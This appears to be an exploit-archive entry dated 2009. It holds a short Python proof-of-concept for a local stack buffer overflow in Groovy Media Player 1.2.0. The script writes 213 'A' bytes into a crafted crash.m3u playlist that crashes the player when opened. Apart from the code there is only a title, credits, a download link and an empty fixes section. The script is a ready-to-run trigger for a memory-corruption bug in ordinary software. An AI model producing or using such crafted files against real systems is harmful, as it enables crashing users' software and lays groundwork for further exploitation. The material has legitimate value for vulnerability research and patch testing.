Groovy Media Player 1.2.0 (.m3u) Local Buffer Overflow PoC
2009-08-06 17:03:16#!/usr/bin/python
print "Groovy Media Player 1.2.0 (.m3u) local stack overlow POC"
print " finded by : opt!x hacker <[email protected]> "
print "download: http://www.bestwebsharing.com/downloads/groovy-media-player-setup.exe "
junk = "\x41"*213
file=open("crash.m3u","w")
file.write(junk)
file.close()
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.

